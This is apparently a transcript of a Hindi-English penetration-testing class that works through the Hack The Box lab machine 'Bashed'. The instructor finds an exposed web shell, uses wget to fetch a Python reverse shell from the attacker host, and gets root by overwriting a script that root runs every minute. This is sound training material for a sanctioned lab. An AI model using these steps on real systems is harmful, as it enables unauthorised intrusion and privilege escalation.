It's possible that if we develop commercial with done with others.
सर एक डाउट था मेरे को।
हाँ जी पूछिए।
सर मैं ना अभी बास्टर्ड वाली जो मशीन है जो विंडोज की है,
हम्म।
वो सॉल्व कर रहा था। तो मेरे को ना एक बीच में प्रॉब्लम आई कि लाइक इसका एक्सप्लॉइट कैसे ढूंढना है, क्योंकि उसका सिर्फ पोर्ट नंबर 80 वो था, ओपन था।
हाँ।
तो मैंने वो चीज एक बार वीडियो रेफरेंस लिया कि जस्ट बिकॉज कि देख लूं कि एक्सप्लॉइट कैसे ढूंढा जाता है।
हम्म।
तो उसमें ये बताया गया था कि कोई गिटहब से उन्होंने एक्सप्लॉइट उठाया था,
हम्म।
डेवल डॉट php करके ऐसे कुछ था।
हम्म।
बट मैं उसको रन करने की कोशिश कर रहा हूँ तो वो रन नहीं हो रहा है। तो फिर मैंने सोचा कि शायद php इंस्टॉल्ड नहीं होगी, तो वो तो इंस्टॉल्ड, बट फिर भी वो पता नहीं क्यों रन नहीं हो रहा था। और वो मतलब हो ही नहीं रहा था।
कहाँ से वीडियो रेफरेंस लिया था?
मैंने आईपी से आईपी6 को सब्सक्राइब कर रखा है ना मैंने, तो मैं उसी में से रेफरेंस उठाता हूँ सारा।
सो जो भी आपको ये कुछ रेफरेंस चाहिए होता है हैक द बॉक्स का ना, तो उसके लिए
हाँ
बेस्ट रेफरेंस है आपका इपसेक। ओके।
हाँ, इसी में से देखा था सर मैंने।
इस चैनल को आप फॉलो कर सकते हो। ठीक है जी।
हाँ।
अब आपका वो डाउट आता है कि भाई एक्सप्लॉइट ढूंढना कैसे है, क्या करना है, वही चीज़ तो हम यहाँ पे सीख रहे हैं।
हम्म।
सब चीज़ें तो हम सीख रहे हैं, एक्सप्लॉइट ढूंढना कैसे है, डाउनलोड कैसे करना है, मॉडिफाई
हाँ
कैसे करना है, रन कैसे करना है, उसको ट्रबल शूट कैसे करना है, ये सब चीज़ें तो सीख रहे हैं हम। नहीं।
हाँ, जो इसने बताया सर वो ना मैनुअल वाला था, तो
हाँ।
मैंने सोचा एक बार मैनुअल ट्राई कर लेता हूँ। तो
हाँ।
वो पूरा ही पता नहीं इसने अलग बताया। तो
हाँ।
मैंने वो चीज सेम टू सेम करके देखी, तो वो चीज रन ही नहीं हो रही थी। वो जो क्या था, पेलोड वगैरह था कुछ, तो भी वो रन ही नहीं हो रहा था। वो
अच्छा।
दिक्कत आ रही थी।
चलो कोई नहीं, देखेंगे उसको भी, ठीक है, कोई इशू
ठीक
नहीं।
है।
ओके, सो एवरीबडी इज हेयर नाउ, लेट्स स्टार्ट। Let me open my terminal. And before that, any doubts so far? Any issues? Did you guys try doing whatever we have covered so far?
हाँ सर, बस एक बार ना वो जो आपने कल बताया था ना, मैनुअली को ऐसे करते हैं, फिर नेट कैट के थ्रू उसको पोर्ट पे लिसन करते हैं।
हाँ।
तो वो एक बार सर अगर एग्जांपल अगर ये कुछ दिखा सकते हो तो थोड़ा अच्छा हो जाता ना।
दिखाएंगे, मैनुअली ही करेंगे हम आगे, जो एक्सप्लॉइट वगैरह हम करेंगे
हाँ
विदाउट
हाँ।
मेटास्प्लॉइट। आज हम मेटास्प्लॉइट का यूज नहीं करेंगे, ठीक है
ठीक
ना।
है। और सर एक चीज और, ओएससीपी में सर मेटास्प्लॉइटेबल यानी ऑटोमेटिक ये वाला अलाउड होता है क्या?
मेटास्प्लॉइट फ्रेमवर्क।
नहीं नहीं, हाँ मेटास्प्लॉइट और इवन जो ऑटोमेटिक पेलोड एग्जीक्यूशन है वो अलाउड होता है?
ऑटोमेटिक पेलोड एग्जीक्यूशन क्या बोल रहे हो तुम? ये मैं तो समझ नहीं पाया, क्या होता है
सर
ऑटोमेटिक?
जैसे हम मेटास्प्लॉइटेबल के थ्रू हम पेलोड लाइक उसमें ढूंढते
मेटास्प्लॉइट
हैं।
मशीन है ब्रो, मेटास्प्लॉइट
हाँ
मशीन है।
हाँ, मेटास नहीं नहीं सॉरी, मेटास्प्लॉइट फ्रेमवर्क जो है,
हाँ।
ठीक है, उस पे हमने क्या किया था कि पेलोड ढूंढा था, यूज किया था और उसमें
हाँ।
फिर डाला था सब कुछ।
हाँ।
तो ये चीज एप्लीकेबल मतलब ओएससीपी प्रोवाइड करते हैं कि हाँ तुम मेटास्प्लॉइटेबल का यूज, मेटास्प्लॉइट का यूज कर सकते हो और पेलोड इंजेक्शन किसी भी वेबसाइट पे।
सो एक्सप्लॉइटेशन के लिए बेसिकली,
हाँ, एक्सप्लॉइटेशन के
कॉम्प्लिकेट
लिए।
मत करो, सिंपल है। मेटास्प्लॉइट से आप एक्सप्लॉइटेशन करते हो
हाँ।
तो
तो हाँ।
OS में अलाउड होता है, लेकिन कंडीशनल होता है मेटास्प्लॉइट। कंडीशन ये होता है कि टारगेट में आपके पास 5 मशीन्स रहेंगी
हम्म,
and you can only use Metasploit against one machine.
ओके,
Okay.
5 में से 1 कोई भी,
हम्म
5 में से कोई भी एक मशीन पे कर
कोई भी
सकते
एक मशीन पे आप Metasploit यूज कर सकते हो, तो यूज कर सकते हो लेकिन एक पे यूज कर सकते हो.
हो. ओके.
Okay.
हाँ.
So what about others, guys? Any doubt, anything that is not clear from previous
Sir,
sessions?
I tried that
Hmm?
double machine. Okay,
Yeah.
there is error, FTP connection error.
FTP connection error.
Yes.
Is it saying timed out?
Time. No, no other error. Not that one.
You
No,
do one thing. You share me your screen. Okay.
sir, no, I did on another machine, not this machine.
It's on
Not
another
this.
machine.
Yeah.
So how would I be able to troubleshoot it then? If I'm not.
Okay. Okay. I will prepare tomorrow and then.
Yeah, so at least whenever these kind of errors appear, take a snapshot of it, take a screenshot of it,
Yes.
so that I have something to refer upon. Refer
Okay.
to.
Okay.
Okay. So let's set up my VPN connection. That is sudo open VPN. It's in.
सर तो फोल्डर में है ना आपके.
Okay. Initialization sequence completed. Let's open a tab over here. Let's do BAST today. BAST. Okay. Go here. Let's search for BAST. And let's deploy this machine. Let's reset this machine. Okay, the target IP address for today's session is 10.10.10.68. Okay. I believe I must have shared some CTF note-taking templates with you guys. How many of you are actually taking notes of whatever you are doing, whatever steps are being performed by you? No one?
Sir, I'm performing exact steps like making folders and like I just solved a machine like Optimum. Then I created a folder named Optimum, and then I created another folder in Nmap. Then I stored scans under Nmap. I'm not using Cherry Tree for now.
Okay.
Just making folders.
Okay, so what I'm saying is, Cherry Tree is going to help you out in report writing as well. Okay, that's what I'm saying. So it's a good practice to pen down whatever you are performing. Okay. Anyways, so machine has been deployed, I believe, 10.10.10.68. Copy this one. Let's do a ping. Okay, it's up and running. I would probably be having a Nmap directory already, right? So let's perform a very basic Nmap scan. First things first, let's do a Nmap scan. Nmap followed by target IP address. Okay, press enter. And simultaneously, to save my time, I'll be running a full port scan behind the scenes. running a full port scan over here and running a very basic nmap scan over here.
सर एक चीज पूछनी है.
Yeah.
Why are we not using hyphen a instead writing p and hyphen n and then verbosity and then we are outputting it, rather using port or something like hyphen n, we can directly use hyphen a also. That will save our time.
ऐसा होता है क्या?
सर मैंने करके देखा तो डिफरेंस मेरे को ये लगा कि ए से बहुत थोड़ा जल्दी निकल जाता है rather
So
इसके.
what does hyphen a means? That's the first question.
अच्छा, हाइफन ए इज फॉर लाइक वो आपको सारी इंफॉर्मेशन देगा, ट्रेस रूट, पोर्ट्स ओपन, वर्जन डिटेक्शन और इवन स्क्रिप्ट भी वो खुद ही रन कर देता है. तो इट्स द होल पैकेज.
Okay, it's the whole package. So you are
काइंड ऑफ.
saying why I'm doing hyphen n and why I'm doing hyphen vvv, why I'm doing hyphen p hyphen, and why I'm not
Yes,
doing why I'm not replacing with hyphen a.
yes.
The answer is very clear. The answer is in the functionality of these flags. Hyphen
Okay.
a is not going to be equivalent to hyphen n. Hyphen a is not equivalent to hyphen vvv, and hyphen a is not equivalent to hyphen p hyphen. What does hyphen p hyphen means?
Hyphen p hyphen means listing all the ports
How
from
many?
1
From
to 65,000 approx. Maybe there are 65,500 approx.
535.
535. Yes.
So hyphen a is not going to scan all those ports. Okay.
Okay.
And I used hyphen n flag, that is for do not resolve for DNS. That is not going to happen with hyphen a. Hyphen a is not going to do verbose output. Okay.
Okay.
Yeah, that is a totally different thing. Hyphen a basically hyphen a stands for aggressive scan, and it basically includes that hyphen capital O and a hyphen SV flag. That's what it is doing, nothing else.
Okay. Got it.
Okay, so the complete scan is running. Meanwhile, our very basic nmap scan is done. So we do have port number 80 open here. Anything else? As of now, so far, nothing other than port 80. Okay. Let's do nmap hyphen p 80 scv hyphen capital O target IP, save the output in, let's save it in temp directory, scan2, let's do a sudo as well. Okay. Meanwhile, this is running. Let's run a vulnerability scan against this port as well. Nmap hyphen p 80 hyphen script vuln output all format. And here my version detection scan and OS detection scan is completed. And here what I can see is, this is the first point. Some sort of Apache server is running. Apache 2418 is running. Okay. And we have some sort of HTTP title over here. That means some sort of website is running over here, which is having title as Excel development site, something like that. Okay. Other than this, I can see that, okay, this is my target Linux system. The target is a Linux operating system. Okay. Okay. So Let's not wait for these scans to finish, and instead let's go to our browser and try to enumerate this application on port number 80. So let's paste this IP address here. So it says something like PHP bash. Okay. Now what should I do next?
View source code.
Okay, view source. What else? Tell me.
We can just kind I'm not understanding. तो बस ये कहना था सर कि लाइक हम ऐसा कर सकते हैं ना कि हमें पता है अपाचे सर्वर चल रहा है तो we can just find the exploit for the Apache version.
Okay.
You can find the exploit of the Linux version.
Exploits of what? So what?
Linux version.
Linux version, but I believe I have already told you guys that the Linux version that is being depicted here, where is it? This is not to the point. This is not precise.
Okay.
So we can search the directories, we can look for a directory so that we can know what directories are on the websites.
I can perform directory brute forcing.
Yes.
Okay.
Or else we can just put the extensions to the like the URL, like we can put it admin.php, something like that, if possible.
Okay, so that is going to be done automatically by the directory brute forcing itself.
Okay.
Yeah, we do not need to do it manually. Anything else comes to your mind?
No.
Okay, so I can run a Nikto scan.
Yeah, it was.
I can do Nikto as well. Okay, so let's start one by one. And before everything, the first thing is explore the website. That is the important thing. Just explore the website. Do not think of attacking the application. Do not think of enumerating the application. Okay, don't think it that way. Just think it like you have a website and you are trying to understand that website, like what is happening here, what all web pages are already there. Okay, how it is mapped. So while exploring the website, in the bottom left corner some URL is visible.
Visible.
Yes, sir.
What is that?
Single.html.
Yeah, but what does it means?
It will redirect to some page if we click on it. Kind of like that.
Right, it is going to redirect us. This is essentially your href link. Okay, if one of you knows a little bit about HTML,
Yes.
these are href links, and when clicked on something, you are going to be redirected to something else. Okay.
Okay.
Yeah. So while exploring this website, I am going to have a look on the href links that are on the bottom left, like where am I going to be redirected. I want to explore this website. Okay. Index.html, single.html. So PHP bash. It says PHP bash helps a lot with pen testing. I have tested on multiple different servers. Blah blah blah. I actually developed it on the exact server. Okay, so there is some sort of PHP bash running on the server. So let's try to have a look like what is PHP bash exactly. If you already know it, well, that's good for you. If you don't know it and you face something new in your pen test, just try to Google it. PHP bash, let's see GitHub. And it says it's a semi-interactive web shell. Okay. So it's some sort of a web shell which is available here on the server. It looks like this. Images are available here. And along with this, you can see even the GitHub URL is also provided to us. Okay. In this image, I can see something like uploads phpbash.php. Let's just try to randomly open it. Uploads phpbash.php. Not found. Okay. Let's follow to the GitHub URL. So these are one and the same URLs. Okay. So here in the GitHub repo, I can see there are two files, two PHP files. Probably they are also running here on this server. Okay. Now our task is to find it. Okay, because if we are able to find these files, these PHP files running on the server, we would be able to get our command execution directly on the server. Why? Because these are your web shells. Okay, and there's a web shell that is present over there on the target server. Okay, that's one thing. Another thing is, let's start with the Nikto and keep it running behind the scenes. Our Nmap vulnerability scan is over. Does it says anything? It says likely vulnerable to what?
DOS attack.
Slow is a DOS attack. So in pen test, we are not concerned about the DOS attacks. Okay, so we will ignore this one as it is. Okay. We have Nikto running here. Let's try to do directory brute forcing as well. Let's start GoBuster. So I've written down this command. I hope this command is clear to you.
Yes, sir.
What about others? This is clear.
Sir, what's -T?
Clear.
-T is for threads.
Okay.
That is, yeah, threads. Let's run it. Meanwhile, I can just explore this website, clicking here and there. I can just see what is happening. So there is nothing much to this website. Okay, this is, I believe these are the only two pages that exist on the website. One is PHP bash that says that PHP bash is installed here. So our whole focus here is now to find out the PHP bash. Okay, figure out where it is. Let's see. Okay, so the Go Buster is completed now. Okay. Where is annotation? Yeah. So now who is going to tell me the meaning of these status codes?
The 200 is for okay, like you can access that web page.
Okay.
400 series is like authorization, like if you 403 is maybe authorization required, 404 is forbidden, something like that.
Okay.
301 is not accessible, maybe. I don't know about 300.
Okay. What about others?
300 is for redirect.
Yeah, redirect.
And 500s?
500 server timeout.
That is server side errors basically. Okay.
Yeah, server side errors.
So basically here we are going to be interested in 200 response codes and 300 response codes prima facie,
Yeah.
because 200s are going to be opening and 300s are going to be redirecting you to somewhere else. Okay. So let's see. 403. 403, 403, 403, 301. Let's try CSS. Not useful. Let's search /dev.
There are two files.
Are you guys able to relate this thing with these files, the file
Yes, sir.
names which are available here? The same files which are available in the GitHub repo are available here as well. So we have successfully found the directory, that is dev directory, and let's click on it. And here I believe you guys also can see that I have got something like shell or something like terminal over here.
Yes, sir.
Okay. This is an example for web shell. This is how your standard or very basic web shell is going to look like. Okay. So let's try to run who am I? And I am data. Okay. So I'm a very low privilege user over here. I'm not very high privilege user over here. Well, not an issue. But the first thing that I would like to have is a stable shell, a normal shell on my terminal, not on the browser. Okay. So before doing that thing, I need to know what all languages are being supported by the target machine. How can I do that?
During the source code, I guess.
See, I want to know if Python is installed.
No. PHP is installed.
Any way out?
Maybe the Python is not installed.
So the command in this case scenario that I'm going to use is which. So this is telling me what all things, what all stuffs are installed on the target or not. So by this time I can see which, let's do which PHP. Okay, so from here I can see that okay, Python is installed, Python 3 is available, Perl is available, PHP is available, Ruby is not available. So I'll be restricting myself from using Ruby. Okay. So now what I can do is I can simply upload a reverse shell over here. It can be in any language. Okay. So what I'm going to do is I'm going to check if I would be able to upload it or not using wget. So let's see if wget is here. Wget is also available here. So now it's very easy for me to download something to the target from my host machine, from my Kali machine. So let's do one thing. Let's get Python based shell over here. Let's say Python pty shells. Okay. So what you need to do is you need to clone this repo from here. I have already cloned it. Where is it? Yeah, here it is. Python pty shells. I have my Python pty shells over here. So now what I'm going to do is I'm going to take a reverse shell from here. I'm going to upload that shell. Before uploading, I'm going to modify that shell, upload that shell to my target and get it executed. So the shell that I'm going to use is TCP pty back connect. Let's try to show it to you. Very simple shell where I need to do a little bit of modifications. So let's do it. And what do I need to change here?
L host and L port.
Why should I change it here?
Because it is set to 127.0.0.1,
To
which
reverse
is
connection.
for reverse connection.
Reverse connection.
Okay, anyone else would like to try it as well? Let's get my IP address. Okay. Let's not modify this file over here. Let's copy this file to my Optimum directory and then modify it. So cp TCP PTY back connect to here. Okay. To PT HTTP bashed. Okay, so I have my shell here. Let's rename this shell to something else. Let's do MV as Python reverse shell.py. Let's try to modify it now. And I can just keep this R port or L port, sorry, to default value, that is 1337. I can keep it this way as well, or I can just change it as well. Let's just change it. Let's make it 1234. Save this file and now I need to upload this file to the target server, execute this file and catch the shell. Okay. So let's see, where is the file? Here is the file. And I do have wget available. So what I'm going to do is I'm going to simply start a simple HTTP server here for file transferring. Let's do a wget over here. Let's go to temp directory. What was the name of the shell? It was pyriv shell. Okay. Pyriv shell dot py hyphen capital O shell dot py.
Sir,
Yeah.
what is you used hyphen O and then you write shell dot py? What that does means?
What are you saying? I hide something?
नहीं
This one, hyphen O.
yeah hyphen
This
O.
is for output, like wget is for downloading something, getting
हाँ,
something. Download this file and save the file with this name.
okay.
Okay. Let's do ls over here. So I can see my file over here, and this is a Python based reverse shell. So when this shell is going to be executed, I'll get a connection back because in the L host and L port, my attacker IP and attacker port number are mentioned. So parallelly, I want to set up my listener as well. Okay. Basically, I can say my shell handler. So I'll set up my listener now. Let me show it to you. Where is my, yeah, here it is. Let's copy this one, TCP. Well, we do not need to copy it. I can just run it here as well. Sudo python TCP pty shell handler -b for bind 10 10 14 11 and port number 1234. Now basically I'm using this TCP pty shell handler for catching a shell, that is TCP pty back connect. Already uploaded it. Let's execute it. So here we can see, and we got a shell back. Right, guys?
Yes, sir.
So what I have done here is I can simply say that I already had this shell, but it was browser based. So I just wanted to have something on my command line. So that's why I got this shell. Otherwise, we also had our command execution, our PHP bash, terminal emulator on that website itself. Let's quickly do who am I. And I'm www data. So that means I need to escalate my privileges, right?
Yes, sir.
So now how can I escalate my privileges? There are
Uh,
multiple, yeah.
Using suggester, Metasploit suggester.
Can I use Metasploit suggester here?
No, sir.
Because this is not, I'm not working inside Metasploit,
No.
right?
Right.
Right, sir.
Okay, so from this point, I need to locally enumerate my machine. Okay, expecting something to be misconfigured, something to be wrong in the machine, and finding some sort of a way to escalate my privileges to all the way to the root. So first thing first, let's see pwd. I am temp. Let's see. Let's go to our privilege escalation guides. So here you can see this. This is the fourth point. It says exploiting sudo rights user. Okay, you can go through this stuff, and what does it says? You can just type sudo -l, and it is going to print the commands which we are allowed to run as sudo. Okay, so let's just check it out. Sudo -l. What can I run as a sudo? So I can run. I cannot run as sudo. I cannot run it as root, but I can run any command, or I can say I can run all the commands using script manager user without the need of any password. This thing is clear from the sudo file, right?
Right.
Right, sir.
Okay. So this is one thing. Let's quickly do one thing. Let's do sudo -u script manager /bin/bash. Who am I? And I'm script manager. And what I did here was I just tried to do sudo. I tried to run bin bash as the script manager. So I got a script manager tab, script manager shell over here. Okay. And one more resource, let me just share it with you, explain shell. Oops. If anytime some Linux commands are not clear to you, you can anytime go here, sudo -u. So I'm trying to do sudo as a specified user. By default, it is root, but I can mention any specific user as well. Manager /bin/bash. And here you can see -u is for user, followed by the username. To execute a command as another user. Okay, so I got a script manager shell. Let's go to home directory. And when I did ls over here, I can see there are two directories over here. One is script manager and the another one is Excel. Let me see if I can get any flag over here. Okay, so inside the script manager directory, there is nothing here. Let me just do pwd once. Yeah, I'm inside the script manager directory, but there is nothing here. Let's go to the another user directory, that is Excel. And doing an ls over here, I can see that there is user.txt file over here. So this is probably the first flag for this machine. Let me just check it out, check out the permissions of this file as well. And here we can see that, okay, we are not an Excel user, but still we are allowed to read this file. So still it is accessible. I can simply do cat followed by user.txt. Guys, you guys are able to follow along, right?
Yes, sir.
If there is any doubt or difficulty, you can ask me now.
Sir, question is, why we not use the netcat here for listening?
Sorry, you are saying position, so what?
No, my question is why we didn't use a netcat for listening on a port. Rather, we use the git clone shell handler.
Okay, that is because of the payload type we are using. The payload that we were using was Python pty shell. Where did it go? It is here somewhere only. That's why we are using that specific listener. It's like when I'm using Meterpreter payload, I can only listen it through Meterpreter, through Metasploit Meterpreter, exploit multi-handler. I cannot just do netcat. Okay. But instead of using this Python payload, if I would have just downloaded some generic Python payload, okay, some generic Python payload. So at that time, I would be listening for the incoming connection using the netcat itself. Okay. Okay, Ayush.
Yes, sir. Okay.
Okay. So let's try to read this file, cat user.txt, and we have this flag in front of us. Okay, we can simply copy it and paste it over here in the bast section. Okay, let's get back here. So we have successfully found the user flag. Okay, now we need to escalate our privileges to the root user. Okay, so more local enumeration is required. More privilege escalation techniques are going to be used. So let's do ls. Okay, cd, ls. Everywhere, let's do ls-la. Where am I? I am in the topmost directory over here. Where did my terminal go? Yeah. So there is something unusual over here. Can you guys tell me what is unusual over here?
There are 2 points of thing like unusual is only one script is contained script manager, and like every single directory is containing root. Like we can found it in root where it is given just above the script manager root directory.
Okay, what about others? Justin, are you saying something? Because you are not audible.
Yeah, I didn't say anything, sir. Only this difference only script manager on script manager folder, and the other root is other files are in the root. That is only difference I can see.
Okay, so basically, by default, in a basic install of any Linux distro, these directories are going to be owned by the root user, and they are going to be part of the root group. But there is one directory over here which is a bit unusual. That is the scripts directory.
Yeah, that's right.
And this scripts directory is owned by the script manager user.
Okay.
Okay, so we can probably go through this directory. We can read through the directory. Seems to be interesting. Let's see. Let's check it out. What is there inside this directory? Let's do cd cd scripts ls, and when I did ls-la over here, I can see there are two files in this directory. Okay, one is a Python file and another one is a text file. Looking into the file permissions, again there is something unusual over here. Let's try to first of all read these files. Let's do cat test.py. Okay. So one is a Python file, one is a text file. Can anyone tell me what is the meaning of this Python code over here? in the test.py?
Sir, it is a Python format file, like written in a Python, used for file handler. F open and F close are used for file handling. Um, F open is say that test.txt will open, and it shall maybe permission is W for write, and then F dot write is testing 1 2 3. If will perform like if we open test.txt, it will show us testing 1 2 3, and it will then directly close the file. Something like that.
Okay, so basically here I can see that file handling operations are being performed in this Python file. Okay, by going through the code, it's a very small code, just a 3-line code. So you do not need to be a very big coder to understand this thing. It's very basic stuff here. So it says f is equals to open test.text, comma w, f dot write testing 1 2 3 exclamation mark, f dot close. So what is happening here is a file is being opened. If it exists, it is going to be opened. If it does not exist, it is going to be created. Okay, so test.text is opened with write permissions, with write properties, and what is being written in the file? Testing 1 2 3 exclamation mark is being written in the file.
Yes, sir.
Okay. Let me just try to mark them parallelly. This is inside the test.py code, and when I did cat test.text, you can see that this is something which is there inside this file.
Yes, sir.
Okay,
Yes, sir.
can you observe anything other than this? This is one thing, okay, that there's a Python file and there's a text file. Python file is having some code. That code is going to be executed, and a text file is going to be created. Okay. What else can you guys observe here?
The text file is created in the root.
So this is another thing that we can observe the
Yeah.
difference. The difference is that the script manager is the owner and the creator of the Python file. Okay, but the text file is being created by the root. So that means that this Python file, if this Python file is going to be executed using script manager, user permissions, so the output file should also have the script manager user permissions. But that is not the case here. Okay. So probably this test.py file is being run as sudo. It is being probably run as root. Okay. That's why the output file is being created with root permissions. Okay. This thing is clear.
Yes, sir.
What about others?
Yes, yeah, clear.
Yeah.
Okay. So there's one more thing that you guys need to observe over here. Let me know if you guys can observe anything else.
Sir, the permissions.
Yeah, permissions is right. Okay.
It's
So when you say permissions,
yeah.
what exactly are you referring to?
Referring to that the permissions for user and a group is readable, but the owner of the whole the person who just made this,
Mhm.
he can read and write also. But other than him, everyone just only can read the file and cannot write anything on it.
Mhm. Okay, so basically from this point, I can say that I'm able to write this file, this test.py. Okay,
Um,
I can write this file, but can I write anything to this file? Can I modify this file,
no,
test.txt? I cannot touch
uh,
this file. I can just read this file,
read this file.
nothing else. Okay. What else can you guys observe here? There's one more thing that needs to be observed here.
But it is showing total 8 files. Like it is showing total 8, but I cannot understand what is 8 actually, because the files are only 2,
Mhm.
but total is showing 8.
Okay, look for something else.
Both are created in different month.
Hmm? Sorry,
Both both are created in different month.
different month.
Yeah.
Right, so that's one thing. Okay, so test.py was created in December 4 and test.txt was created on September 22. And not only this, you need to observe the timings as well.
Yes. 336.
336.
That means today.
Okay, so basically, can you see the time is being changed?
Yes, sir.
40. Yes.
Let's just check uh, the current timing. Okay, let's just type date. So current date as per this machine is September 22, 3:45, 3 PDT. This is different time zone. Okay, do not get confused like it's 4:10 here, but it is showing 3:45. This is different time zone. So okay, it's 3:45, and I can see that just now on 3:45 this file was created. Previously it was created on 3:43, before that 3:41, 3:36. Let's again do date. Okay, ls-l date 3:45, 46 seconds. ls-l date 2 more seconds and it is going to be 3:46. Let's do date 3:46 ls-l a, and I can see that this file was created on 3:46. Okay, so what inference can I derive here? Can you derive any inference here by
Uh,
observing? Yeah.
every time we are just putting the command ls hyphen l, it is maybe it is running in the background every time we put ls hyphen l. Every time it opens in the background and close it.
Mm-hmm. Okay.
Uh, huh.
I
Okay.
think
So actually, yeah.
I think the Python is executing this text file every
Huh.
time.
Every time we put the command, it is executing in background.
So actually, it has nothing to do with the ls-l command. Okay. It is not like we are executing this command. We are executing this file or something like that. We are just trying to see the output. ls does not mean anything else. ls-l does not mean anything else. What is to be derived here is there is some kind of a scheduled job or scheduled task which is running behind the scene. Okay, behind the
Hmm.
scene This script is running automatically with root permissions. Every minute it is running, and it is running every minute. That's why, see, if I'm going to run this script every minute, a new output is going to be created.
Yes.
These properties are going to be changed. Okay, that this file was created on 346, 345. So basically the main inference that needs to be derived here is that root is running this file, Python file, every minute. Okay.
Okay. Sir.
So probably there is some sort of scheduled task behind the scenes. Okay. We do not need to worry about that. The only thing that we need to worry about is, can we modify the Python file? Okay. If we can modify the Python file, that test.py, and we put some malicious code inside the Python file, so then what is going to happen? Root is going to execute this file every minute. And when this Python file is going to be executed, then a malicious code which is inside that Python file is going to be executed
Yes,
with
sir.
root permissions, right? So
Yes.
I can simply put a reverse shell in the Python format in there and get a shell back with root permissions. The logic is clear.
Yes, sir.
That's right. Yeah, that's right.
Okay, so I understand that the logic is clear to Ayush and Justin, but what about others?
Clear.
Okay,
6 people we have.
so now can you tell me how can I put my reverse shell in the test.py? Now this is another question.
By changing the permissions to the to writable format.
We already have the right permissions. See, I am script manager. I have write permissions to this file. I already have the permissions.
So we need to add the code inside.
So we need to write the code inside, right? But how can I write the code inside? That's what I'm asking.
Um, using like we have to edit the code, right?
Right, we need to edit the code.
We can use Vim and then we can write test.py.
Right, so we can use any command line text editor over here. That's one thing.
Yes,
Okay,
sir.
we cannot use any GUI based text editor like mousepad
Mousepad.
or leafpad. We cannot do that here because we are not interacting with the GUI with the target machine. We are just interacting with the CLI. So I can just do VI, open the file, and start writing my reverse shell manually. Okay, that's one way out, but that is very tedious process. Okay, so instead what I'm going to do is, as you can see here, if I just show you ls cat py reverse shell, if I need to type the Python reverse shell manually, this is the code that I need to type. Okay, so instead of this, what I'm going to do is I'm simply going to download this file and save it with the name of test.py in the same directory, in the same location. Okay. So let me just modify this file once again and change the port, or let's just do vi. Let's change the port over here because already I'm having a connection on port number 1234. Okay. So now I will be changing the port to, let's say, 9632. Let's save this file and let's get our listener over here. Python tcppty shell handler -b for bind 10 10 10 14 11 colon 9632 enter. Now I'm listening for this on this socket, on this port number, and I have successfully edited the file. Yes, now I need to send this file to the victim machine. So let's set up a simple Python server over here. Okay, let's do sudo python 3 -m http.server. This is one way of doing it. If you are going to use Python 3, this is the syntax. If you are going to use Python 2, -m simple http server port 80, press enter. So it's one and the same thing. It just depends which kind of Python you are using. So the syntax varies a little. So now my machine is serving some files which are there inside this directory. So let's just download the file wget http 10.10.14.11/py-rev-shell.py-O. Let me just confirm the file name over here. py-rev-shell. Okay, py-rev-shell.py-O and save the output as
test.py.
.py. Okay, and press enter. Successfully saved. 100% done. ls-la. The file is modified right now. Let's try to read it. Test.py. I have my reverse shell in this file now. Okay, let's type date over here. It's 3:54. Do I have a shell over here? I do not have a shell over here. Let's wait for 1 minute to happen. 35 seconds, 42 seconds. I need to wait for 18 more seconds. No, not 18 more seconds. It is going to be, yeah, 18, right. Let's see. Within a second, this file is going to be executed by the root permissions and we'll get a shell back. So let's just do date. The minute has changed now. Okay. And let's check it out. We have a shell over here. Right?
Yes, sir.
Who am I? I am root. Let's go to root directory. So I can just read this file now. I am root and I have these root permissions over here. Okay. I believe wc-b root.txt okay, -c wc-c root.txt. So I'm not going to open the root.txt, but you can open it using cat. You can read it. I can just show you that it is a standard 33 character, 33 bytes flag. Okay. So we can just read it using cat. Copy it from here, go here and paste it over here. Provide the difficulty, whatever you feel like. Okay. And that's all. Done. You have successfully rooted a new machine that is bashed. You have successfully rooted bashed. Yeah, guys. So, any doubt?
No, sir.
What about others?
Sir, it is based on Linux, no?
Yeah, it's a Linux.
Linux based on.
Yeah. The target is a Linux operating system. Okay. And yes, guys, one more thing. See, whatever we are doing here, this is not the only way of routing or compromising a box. These are not the only ways. Like if I'm showing you one way out, that is not the only way. There are multiple ways of doing something. Okay. So you guys are definitely open to experimentation. Okay. You guys can try doing it by yourself. Try exploring something else. Try following along with some other walkthroughs or some other write-ups, whatever you find. Okay. If something is not clear, you can definitely ask from me as well. So what I'm just saying is just go out there and try exploring different ways to solve a machine. Okay. Our full port scan is still running. We don't have any output as of now. No worries. Okay. Because we have successfully routed the machine. We do not care about this. Let's close this.
Is it important to run this full port scan every time on a
Yes.
machine?
Yes. Because maybe there is some important port which is missed by the basic Nmap scan.
But it takes too much time to just give output.
So what? So you are not going to run it?
No, no. It is taking time, so you just go through the remaining procedure.
Yeah, right. So that's why we run these scans behind the scenes. Okay. We just keep on, we need to ensure that we are not sitting idle. Okay. And the computational power is also not sitting idle. We have something to poke around and the computer is also doing something behind the scenes. That's what we have been doing for so long, right? Every time you would have seen that some sort of scan would be running behind the scene and I would be doing something else. Okay. So that if whatever I'm doing right now, if I face a deadlock or if I face a dead end through that path, maybe port 80 was not the way of gaining access to this machine. Maybe that could also have happened, right? There is no vulnerability in port 80, the server is appropriate, there is nothing revealed in directory brute forcing. Okay. And I hit a dead end. I'm not able to exploit the machine. Then what? Then I would have went back to my scans and I would have been looking for something that I have been missing. Did I miss something? Did I miss some port? Did I enumerated this machine properly? Okay. If this, again, if this also is not going to help, then I will be scanning for the UDP ports that maybe something, I'm missing something in the UDP side. Okay.
Yeah.
See again, yeah. So I have not been doing UDP scans because those scans are going to take
A lot of time.
Yeah, much more time than these full port scans.
Yeah, UDP takes more time, more double the time as TCP takes.
Right. So that is the thing. But see, yeah, this is how things happen. Okay. This is how you work. This is how you should approach. Okay.
Okay. Okay, sir.
Right. Okay. So this is the guide that I have already shared with you, right? The PYA2 privilege escalation one.
Sir, can you name one more machine so that we can practice both?
One more machine.
Yeah, just similar to Bash, which is similar to Bash,
No, see,
so that we can practice it on our only. Like we don't have a video reference for that particular machine, so we can just go through that, but experimenting on that.
As of now, there is no exact copy of this machine, but if you want to give it a try, you can try with the beep. You can try. Okay.
Okay.
Let me see. It's, I believe it's relatively old. Beep. Yeah, you can give it a try. Okay. And there are, I believe, more than 4 ways of compromising this machine. Okay. And And definitely, if you get stuck somewhere, you can refer to the IPSEC videos as well. Okay. And
Yes,
yes, one more thing. See, when whatever we are doing here, I would suggest you like practice this thing by yourself. And once you are done practicing, if you have surplus time at your disposal, you can refer to the IPSEC videos as well. Okay. Maybe you will learn something new there as well. Okay. Okay. So yeah, right. That would be all from my side for today's session. Okay.
Okay, thank you, sir.
